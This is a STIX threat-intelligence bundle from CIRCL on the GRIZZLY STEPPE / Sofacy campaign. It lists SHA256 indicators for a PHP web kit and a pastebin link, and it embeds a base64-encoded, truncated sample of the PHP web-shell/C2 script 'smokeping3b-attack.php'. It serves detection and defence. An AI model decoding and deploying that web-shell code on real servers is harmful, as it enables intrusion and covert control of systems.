2023-04-21 13:25:09 +00:00
|
|
|
{
|
2023-06-14 17:31:25 +00:00
|
|
|
"type": "bundle",
|
|
|
|
"id": "bundle--5867a9dc-dde8-4877-b46f-42cc950d210f",
|
|
|
|
"objects": [
|
|
|
|
{
|
|
|
|
"type": "identity",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2017-01-02T15:37:44.000Z",
|
|
|
|
"modified": "2017-01-02T15:37:44.000Z",
|
|
|
|
"name": "CIRCL",
|
|
|
|
"identity_class": "organization"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "report",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "report--5867a9dc-dde8-4877-b46f-42cc950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2017-01-02T15:37:44.000Z",
|
|
|
|
"modified": "2017-01-02T15:37:44.000Z",
|
|
|
|
"name": "OSINT - GRIZZLY STEPPE \u00e2\u20ac\u201c Additional expansion",
|
|
|
|
"published": "2017-01-03T10:07:48Z",
|
|
|
|
"object_refs": [
|
|
|
|
"observed-data--586a7423-3470-4ce5-a56d-1239538826be",
|
|
|
|
"file--586a7423-3470-4ce5-a56d-1239538826be",
|
|
|
|
"artifact--586a7423-3470-4ce5-a56d-1239538826be",
|
|
|
|
"observed-data--5867a9ea-679c-4cc7-b729-4e9f950d210f",
|
|
|
|
"url--5867a9ea-679c-4cc7-b729-4e9f950d210f",
|
|
|
|
"indicator--5867aabb-08e0-4ff3-8987-4c28950d210f",
|
|
|
|
"indicator--5867aabb-51b4-4423-b360-44bc950d210f",
|
|
|
|
"indicator--5867aabc-3e7c-4dfa-8c70-40ce950d210f",
|
|
|
|
"indicator--5867aabd-2bc4-40e4-abd2-4574950d210f",
|
|
|
|
"indicator--5867aabe-05f8-4f84-b473-462d950d210f",
|
|
|
|
"indicator--5867aabf-09e4-4bde-ba43-46e2950d210f",
|
|
|
|
"indicator--5867aabf-1cc8-4337-9149-4cda950d210f",
|
|
|
|
"indicator--5867aac0-292c-445a-9f0d-419c950d210f",
|
|
|
|
"indicator--5867aac1-e534-40a9-8f8f-494a950d210f",
|
|
|
|
"indicator--5867aac1-921c-4a4f-a662-40c0950d210f",
|
|
|
|
"indicator--5867aac2-f4a0-4d76-8691-48ee950d210f",
|
|
|
|
"indicator--5867aac2-ed84-4af7-acad-4b2a950d210f",
|
|
|
|
"indicator--5867aac3-6e80-433a-91b3-4f15950d210f",
|
|
|
|
"indicator--5867aac4-9b2c-41cd-b2b0-4222950d210f",
|
|
|
|
"indicator--5867aac4-1264-42fd-859e-4841950d210f",
|
|
|
|
"indicator--5867aac5-1b88-42ae-805d-40a4950d210f",
|
|
|
|
"indicator--5867aac6-f56c-4213-b3f8-4585950d210f",
|
|
|
|
"indicator--5867aac6-f834-4883-86bf-49f4950d210f",
|
|
|
|
"indicator--5867aac7-95c0-462e-bc38-47f3950d210f",
|
|
|
|
"indicator--5867aaef-e408-43a9-a5c6-4bb0950d210f",
|
|
|
|
"indicator--5867aaef-416c-45e6-9f42-49be950d210f",
|
|
|
|
"observed-data--5867ab00-a5fc-4109-95e5-477a950d210f",
|
|
|
|
"url--5867ab00-a5fc-4109-95e5-477a950d210f",
|
|
|
|
"indicator--5867ab3e-d314-452e-9571-437202de0b81",
|
|
|
|
"indicator--5867ab3e-201c-47d1-8679-463a02de0b81",
|
|
|
|
"observed-data--5867ab3f-5450-4736-9af6-466902de0b81",
|
|
|
|
"url--5867ab3f-5450-4736-9af6-466902de0b81",
|
|
|
|
"indicator--5867ab40-b8e0-43b2-a07a-4c9902de0b81",
|
|
|
|
"indicator--5867ab40-df2c-4b8b-a450-42a702de0b81",
|
|
|
|
"observed-data--5867ab41-ef38-4409-a401-434502de0b81",
|
|
|
|
"url--5867ab41-ef38-4409-a401-434502de0b81",
|
|
|
|
"indicator--5867ab41-18ec-4589-8c03-468e02de0b81",
|
|
|
|
"indicator--5867ab42-0f20-42e5-b3a1-45d702de0b81",
|
|
|
|
"observed-data--5867ab43-eca4-4951-86b7-4b6b02de0b81",
|
|
|
|
"url--5867ab43-eca4-4951-86b7-4b6b02de0b81",
|
|
|
|
"indicator--5867ab43-6134-4a87-8706-4c8702de0b81",
|
|
|
|
"indicator--5867ab44-3338-4e84-ac8c-454102de0b81",
|
|
|
|
"observed-data--5867ab44-0f7c-4a97-af10-4c3702de0b81",
|
|
|
|
"url--5867ab44-0f7c-4a97-af10-4c3702de0b81",
|
|
|
|
"indicator--5867ab45-c924-4de1-b9ab-467c02de0b81",
|
|
|
|
"indicator--5867ab46-dc58-4709-8ae0-4d1402de0b81",
|
|
|
|
"observed-data--5867ab46-ba50-4053-81bc-4c3f02de0b81",
|
|
|
|
"url--5867ab46-ba50-4053-81bc-4c3f02de0b81",
|
|
|
|
"indicator--5867ab47-d8ec-4ab6-b28d-46e002de0b81",
|
|
|
|
"indicator--5867ab47-d048-4e88-bf6a-4e7d02de0b81",
|
|
|
|
"observed-data--5867ab48-a968-445a-ba1b-465b02de0b81",
|
|
|
|
"url--5867ab48-a968-445a-ba1b-465b02de0b81",
|
|
|
|
"indicator--5867ab49-2f70-477a-80b0-4bee02de0b81",
|
|
|
|
"indicator--5867ab49-3744-422a-a88d-4a9c02de0b81",
|
|
|
|
"observed-data--5867ab4a-4bd8-46c6-aa14-427502de0b81",
|
|
|
|
"url--5867ab4a-4bd8-46c6-aa14-427502de0b81",
|
|
|
|
"indicator--5867ab4a-c524-42b3-8c3b-428402de0b81",
|
|
|
|
"indicator--5867ab4b-a970-41e0-9852-4ecb02de0b81",
|
|
|
|
"observed-data--5867ab4b-a214-4922-a374-41ce02de0b81",
|
|
|
|
"url--5867ab4b-a214-4922-a374-41ce02de0b81",
|
|
|
|
"indicator--5867ab4c-a6a4-4421-86a1-481602de0b81",
|
|
|
|
"indicator--5867ab4d-83e0-4c70-a4ee-455602de0b81",
|
|
|
|
"observed-data--5867ab4d-09a0-46be-90b6-42d102de0b81",
|
|
|
|
"url--5867ab4d-09a0-46be-90b6-42d102de0b81",
|
|
|
|
"indicator--5867ab4e-0a04-45cb-972a-44e502de0b81",
|
|
|
|
"indicator--5867ab4f-b268-4b7d-a305-406302de0b81",
|
|
|
|
"observed-data--5867ab4f-b148-40b8-9d4a-405f02de0b81",
|
|
|
|
"url--5867ab4f-b148-40b8-9d4a-405f02de0b81",
|
|
|
|
"indicator--5867ab50-0eac-468d-aadb-44a902de0b81",
|
|
|
|
"indicator--5867ab50-8ac4-419f-ae00-414302de0b81",
|
|
|
|
"observed-data--5867ab51-0a10-44bf-91f0-460d02de0b81",
|
|
|
|
"url--5867ab51-0a10-44bf-91f0-460d02de0b81",
|
|
|
|
"indicator--5867ab52-f1f4-4003-afe1-409502de0b81",
|
|
|
|
"indicator--5867ab52-5264-4faf-9aa1-4ba302de0b81",
|
|
|
|
"observed-data--5867ab53-47cc-41f0-b7e5-4c5102de0b81",
|
|
|
|
"url--5867ab53-47cc-41f0-b7e5-4c5102de0b81",
|
|
|
|
"indicator--5867ab53-cfd4-4844-a83c-4da102de0b81",
|
|
|
|
"indicator--5867ab54-f570-4e06-9e43-45dd02de0b81",
|
|
|
|
"observed-data--5867ab54-f590-4254-97dc-47bd02de0b81",
|
|
|
|
"url--5867ab54-f590-4254-97dc-47bd02de0b81",
|
|
|
|
"indicator--5867ab55-4468-4e85-be37-454c02de0b81",
|
|
|
|
"indicator--5867ab56-85dc-46b2-8b29-4e4b02de0b81",
|
|
|
|
"observed-data--5867ab56-44c4-4de0-8352-4a1f02de0b81",
|
|
|
|
"url--5867ab56-44c4-4de0-8352-4a1f02de0b81",
|
|
|
|
"indicator--5867ab57-8950-4855-8d5e-46c002de0b81",
|
|
|
|
"indicator--5867ab58-6ec4-48e7-8cf6-4eb602de0b81",
|
|
|
|
"observed-data--5867ab58-6044-4572-8efe-4fea02de0b81",
|
|
|
|
"url--5867ab58-6044-4572-8efe-4fea02de0b81",
|
|
|
|
"indicator--5867ab59-2814-4089-a276-4a7102de0b81",
|
|
|
|
"indicator--5867ab5a-12f8-4159-b3bd-405602de0b81",
|
|
|
|
"observed-data--5867ab5b-ff04-4404-8841-4d9c02de0b81",
|
|
|
|
"url--5867ab5b-ff04-4404-8841-4d9c02de0b81",
|
|
|
|
"indicator--5867ab5b-1274-4245-b71a-46d502de0b81",
|
|
|
|
"indicator--5867ab5c-c818-4db9-84a5-4ce402de0b81",
|
|
|
|
"observed-data--5867ab5c-0194-421b-b029-41ac02de0b81",
|
|
|
|
"url--5867ab5c-0194-421b-b029-41ac02de0b81",
|
|
|
|
"indicator--5867ab5d-e71c-4547-ad36-4ef002de0b81",
|
|
|
|
"indicator--5867ab5e-dbdc-45e2-aa3e-4f9a02de0b81",
|
|
|
|
"observed-data--5867ab5e-88ac-476b-89cc-4e2702de0b81",
|
|
|
|
"url--5867ab5e-88ac-476b-89cc-4e2702de0b81",
|
|
|
|
"indicator--5867ab5f-5434-40c4-90b3-405c02de0b81",
|
|
|
|
"indicator--5867ab60-d440-410f-a9c4-4db102de0b81",
|
|
|
|
"observed-data--5867ab60-be3c-4cdc-88aa-499c02de0b81",
|
|
|
|
"url--5867ab60-be3c-4cdc-88aa-499c02de0b81",
|
|
|
|
"indicator--5867ab61-03c0-4aa4-b522-4bb802de0b81",
|
|
|
|
"indicator--5867ab62-6f68-4447-9007-4f3a02de0b81",
|
|
|
|
"observed-data--5867ab62-efd4-45e1-b6c2-44fd02de0b81",
|
|
|
|
"url--5867ab62-efd4-45e1-b6c2-44fd02de0b81",
|
|
|
|
"indicator--5867ab63-cc40-4146-9b84-4d8e02de0b81",
|
|
|
|
"indicator--5867ab63-37b4-4e0a-9066-40c002de0b81",
|
|
|
|
"observed-data--5867ab64-2004-4d85-8222-4e5302de0b81",
|
|
|
|
"url--5867ab64-2004-4d85-8222-4e5302de0b81",
|
|
|
|
"observed-data--5867ab98-aeb0-40b7-97d2-4400950d210f",
|
|
|
|
"url--5867ab98-aeb0-40b7-97d2-4400950d210f",
|
|
|
|
"indicator--5867abaf-a80c-4ef4-87d0-4427950d210f",
|
|
|
|
"indicator--5867abc3-674c-47d9-8082-4d44950d210f",
|
|
|
|
"indicator--5867abd5-2b98-4087-9c66-4a70950d210f",
|
|
|
|
"observed-data--5867ac24-76c0-48b5-829b-4f0e950d210f",
|
|
|
|
"file--5867ac24-76c0-48b5-829b-4f0e950d210f",
|
|
|
|
"artifact--5867ac24-76c0-48b5-829b-4f0e950d210f",
|
|
|
|
"indicator--586b5278-1c38-4615-8db5-46e3950d210f",
|
|
|
|
"indicator--586b527a-c690-4f5a-a7b5-4a1e950d210f",
|
|
|
|
"indicator--586b527b-fb50-4977-9f99-4584950d210f"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"Threat-Report",
|
|
|
|
"misp:tool=\"MISP-STIX-Converter\"",
|
|
|
|
"misp-galaxy:threat-actor=\"Sofacy\"",
|
|
|
|
"circl:incident-classification=\"malware\"",
|
|
|
|
"ecsirt:malicious-code=\"malware\""
|
|
|
|
],
|
|
|
|
"object_marking_refs": [
|
|
|
|
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--586a7423-3470-4ce5-a56d-1239538826be",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2017-01-02T15:39:15.000Z",
|
|
|
|
"modified": "2017-01-02T15:39:15.000Z",
|
|
|
|
"first_observed": "2017-01-02T15:39:15Z",
|
|
|
|
"last_observed": "2017-01-02T15:39:15Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"file--586a7423-3470-4ce5-a56d-1239538826be",
|
|
|
|
"artifact--586a7423-3470-4ce5-a56d-1239538826be"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"attachment\"",
|
|
|
|
"misp:category=\"Payload delivery\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "file",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "file--586a7423-3470-4ce5-a56d-1239538826be",
|
|
|
|
"name": "smokeping3b-attack.php",
|
|
|
|
"content_ref": "artifact--586a7423-3470-4ce5-a56d-1239538826be"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "artifact",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "artifact--586a7423-3470-4ce5-a56d-1239538826be",
|
|
|
|
"payload_bin": "ICAgZGVmaW5lKCdNQUlOX0RJUicsICcuL2NvbmZpbmUvQ29ubmVjdGl2aXR5L0RldXRzY2hsYW5kLycpOwogZGVmaW5lKCdUQVNLU19ESVInLCAnLi9jb25maW5lL0Nvbm5lY3Rpdml0eS9EZXV0c2NobGFuZC9Jbm9kZS8nKTsKIGRlZmluZSgnRklMRVNfRElSJywgJy4vY29uZmluZS9Db25uZWN0aXZpdHkvRGV1dHNjaGxhbmQvTmVzc3VzLycpOwogZGVmaW5lKCdQQVNTJywgJzhiNmY5N2JkM2NkOWM4YzQyZjFlZTU4Mjc4Yjg0MmZlJyk7CiBkZWZpbmUoJ01BSU5fRklMRV9OQU1FJywgJ0RldXRzY2hsYW5kLnBuZycpOwogZGVmaW5lKCdGSUxFU19FWFRFTlNJT04nLCAnLnBuZycpOwogIGRlZmluZSgnTUFJTl9GSUxFX1BBVEgnLCBNQUlOX0RJUiAuIE1BSU5fRklMRV9OQU1FKTsKICAgZXJyb3JfcmVwb3J0aW5nKDApOwogICBjbGFzcyBUYXNrIHsKICAJdmFyICR0YXNrX2lkOwogCXZhciAkdGFza19kYXRhOwogCXZhciAkY3JlYXRlZF9hdDsKIAl2YXIgJGFuc3dlcl9kYXRhOwogCXZhciAkY3VycmVudF9jaHVuazsKIAl2YXIgJHRvdGFsX2NodW5rczsKIAl2YXIgJGNvbXBsZXRlZDsKICAJZnVuY3Rpb24gX19jb25zdHJ1Y3QoJHRhc2tfdXVpZCkgewogCQkkdGhpcy0+c2V0X2RhdGEoJycpOwogCQkkdGhpcy0+dGFza19pZCA9ICR0YXNrX3V1aWQ7CiAJCSR0aGlzLT5jdXJyZW50X2NodW5rID0gMDsKIAkJJHRoaXMtPnRvdGFsX2NodW5rcyA9IDA7CiAJfQogIAlmdW5jdGlvbiBfX3NsZWVwKCkgewogIAkJaWYgKCEkdGhpcy0+dGFza19kYXRhICYmICEkdGhpcy0+YW5zd2VyX2RhdGEpIHsKIAkJCXJldHVybjsKIAkJfQogIAkJJGZpbGVuYW1lID0gVEFTS1NfRElSLiR0aGlzLT50YXNrX2lkLkZJTEVTX0VYVEVOU0lPTjsKIAkJJGRhdGFbJ3Rhc2tfZGF0YSddID0gJHRoaXMtPnRhc2tfZGF0YTsKIAkJJGRhdGFbJ2Fuc3dlcl9kYXRhJ10gPSAkdGhpcy0+YW5zd2VyX2RhdGE7CiAJCSRkYXRhWydjdXJyZW50X2NodW5rJ10gPSAkdGhpcy0+Y3VycmVudF9jaHVuazsKIAkJJGRhdGFbJ3RvdGFsX2NodW5rcyddID0gJHRoaXMtPnRvdGFsX2NodW5rczsKIAkJZmlsZV9wdXRfY29udGVudHMoJGZpbGVuYW1lLCBzZXJpYWxpemUoJGRhdGEpKTsKIAkJcmV0dXJuIGFycmF5KCd0YXNrX2lkJywgJ2NyZWF0ZWRfYXQnLCAnY29tcGxldGVkJyk7CiAJfQogIAlmdW5jdGlvbiBfX3dha2V1cCgpIHsKIAkJJGZpbGVuYW1lID0gVEFTS1NfRElSLiR0aGlzLT50YXNrX2lkLkZJTEVTX0VYVEVOU0lPTjsKIAkJaWYgKGZpbGVfZXhpc3RzKCRmaWxlbmFtZSkpIHsKIAkJCSRkYXRhID0gdW5zZXJpYWxpemUoZmlsZV9nZXRfY29udGVudHMoJGZpbGVuYW1lKSk7CiAJCQkkdGhpcy0+dGFza19kYXRhID0gJGRhdGFbJ3Rhc2tfZGF0YSddOwogCQkJJHRoaXMtPmFuc3dlcl9kYXRhID0gJGRhdGFbJ2Fuc3dlcl9kYXRhJ107CiAJCQkkdGhpcy0+Y3VycmVudF9jaHVuayA9ICRkYXRhWydjdXJyZW50X2NodW5rJ107CiAJCQkkdGhpcy0+dG90YWxfY2h1bmtzID0gJGRhdGFbJ3RvdGFsX2NodW5rcyddOwogCQl9CiAJfQogIAlmdW5jdGlvbiBfX3RvU3RyaW5nKCkgewogCQlyZXR1cm4gJHRoaXMtPnRhc2tfaWQ7CiAJfQogIAlwdWJsaWMgZnVuY3Rpb24gaXNfY29tcGxldGVkKCkgewogCQlyZXR1cm4gJHRoaXMtPmNvbXBsZXRlZDsKIAl9CiAgCXB1YmxpYyBmdW5jdGlvbiBzZXRfZGF0YSgkZGF0YSkgewogCQkkdGhpcy0+dGFza19kYXRhID0gJGRhdGE7CiAJCSR0aGlzLT5jcmVhdGVkX2F0ID0gdGltZSgpOwogCQkkdGhpcy0+YW5zd2VyX2RhdGEgPSBhcnJheSgpOwogCQkkdGhpcy0+Y29tcGxldGVkID0gZmFsc2U7CiAJCXJldHVybiAkdGhpcy0+dGFza19pZDsKIAl9CiAgCXB1YmxpYyBmdW5jdGlvbiBhcHBlbmRfYW5zd2VyKCRkYXRhLCAkY3VycmVudF9jaHVuaywgJHRvdGFsX2NodW5rcykgewogCQkkdGhpcy0+Y3VycmVudF9jaHVuayA9ICRjdXJyZW50X2NodW5rICsgMTsKIAkJJHRoaXMtPnRvdGFsX2NodW5rcyA9ICR0b3RhbF9jaHVua3M7CiAJCSR0aGlzLT5hbnN3ZXJfZGF0YVskY3VycmVudF9jaHVua10gPSAkZGF0YTsKIAl9CiAgfQogIGNsYXNzIENsaWVudCB7CiAgCXZhciAkdXVpZDsKIAl2YXIgJGNyZWF0ZWRfYXQ7CiAJdmFyICRsYXN0OwogCXZhciAkdGFza3M7CiAgCWZ1bmN0aW9uIF9fY29uc3RydWN0KCR1dWlkKSB7CiAJCSR0aGlzLT51dWlkID0gJHV1aWQ7CiAJCSR0aGlzLT5jcmVhdGVkX2F0ID0gdGltZSgpOwogCQkkdGhpcy0+cHJldl9sYXN0ID0gdGltZSgpOwogCQkkdGhpcy0+bGFzdCA9IHRpbWUoKTsKIAkJJHRoaXMtPnRhc2tzID0gYXJyYXkoKTsKIAl9CiAgCWZ1bmN0aW9uIF9fc2xlZXAoKSB7CiAgCQlyZXR1cm4gYXJyYXkoJ3V1aWQnLCAnY3JlYXRlZF9hdCcsICdwcmV2X2xhc3QnLCAnbGFzdCcsICd0YXNrcycpOwogCX0KICAJZnVuY3Rpb24gX193YWtldXAoKSB7CiAJCSR0aGlzLT50YXNrcyA9IGFycmF5X3ZhbHVlcygkdGhpcy0+dGFza3MpOwogIAl9CiAgCXB1YmxpYyBmdW5jdGlvbiBzZWFyY2hfdGFzaygkdGFza19pZCkgewogCQlmb3JlYWNoICgkdGhpcy0+dGFza3MgYXMgJHRhc2spIHsKIAkJCWlmICgkdGFzay0+dGFza19pZCA9PSAkdGFza19pZCkgewogCQkJCXJldHVybiAkdGFzazsKIAkJCX0KIAkJfQogCQlyZXR1cm4gZmFsc2U7CiAJfQogIAlwdWJsaWMgZnVuY3Rpb24gdXVpZCgpIHsKIAkJcmV0dXJuICR0aGlzLT51dWlkOwogCX0KICAJcHVibGljIGZ1bmN0aW9uIHBpbmcoKSB7CiAJCSR0aGlzLT5wcmV2X2xhc3QgPSAkdGhpcy0+bGFzdDsKIAkJJHRoaXMtPmxhc3QgPSB0aW1lKCk7CiAJCSR0YXNrc190b193b3JrID0gYXJyYXkoKTsKIAkJZm9yZWFjaCgkdGhpcy0+dGFza3MgYXMgJHRhc2spIHsKIAkJCWlmKCR0YXNrICYmICEkdGFzay0+aXNfY29tcGxldGVkKCkpIHsKIAkJCQlhcnJheV9wdXNoKCR0YXNrc190b193b3JrLCBhcnJheSgndGFza19pZCcgPT4gJHRhc2stPnRhc2tfaWQsICd0YXNrX2RhdGEnID0+ICR0YXNrLT50YXNrX2RhdGEpKTsKIAkJCX0KIAkJfQogCQlyZXR1cm4gYXJyYXkoJ3Rhc2tzJyA9PiAkdGFza3N
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867a9ea-679c-4cc7-b729-4e9f950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:51:54.000Z",
|
|
|
|
"modified": "2016-12-31T12:51:54.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:51:54Z",
|
|
|
|
"last_observed": "2016-12-31T12:51:54Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867a9ea-679c-4cc7-b729-4e9f950d210f"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867a9ea-679c-4cc7-b729-4e9f950d210f",
|
|
|
|
"value": "http://pastebin.com/raw/gxq0FMsU"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aabb-08e0-4ff3-8987-4c28950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:23.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:23.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_2",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:23Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aabb-51b4-4423-b360-44bc950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:23.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:23.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '3367623638d42bdc1c45c44cb1843c00b510814170bc4e5da61eba2ddb212672']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:23Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aabc-3e7c-4dfa-8c70-40ce950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:24.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:24.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'da9f2804b16b369156e1b629ad3d2aac79326b94284e43c7b8355f3db71912b8']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:24Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aabd-2bc4-40e4-abd2-4574950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:25.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:25.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '972866536f195079071d23b9f8ec90eb32ae3aa493d8cdf5ad34b85dec1a0775']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:25Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aabe-05f8-4f84-b473-462d950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:26.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:26.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'd285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:26Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aabf-09e4-4bde-ba43-46e2950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:27.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:27.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '1025f33ff026495d7f7fdb527e127e2b7780d9d28cb1e7912a9be84f38ba858e']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:27Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aabf-1cc8-4337-9149-4cda950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:27.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:27.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'b8313a966f93f773b031d386afe56792fe1edb0ffd1bc07a9ae72cec48e0d6f1']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:27Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
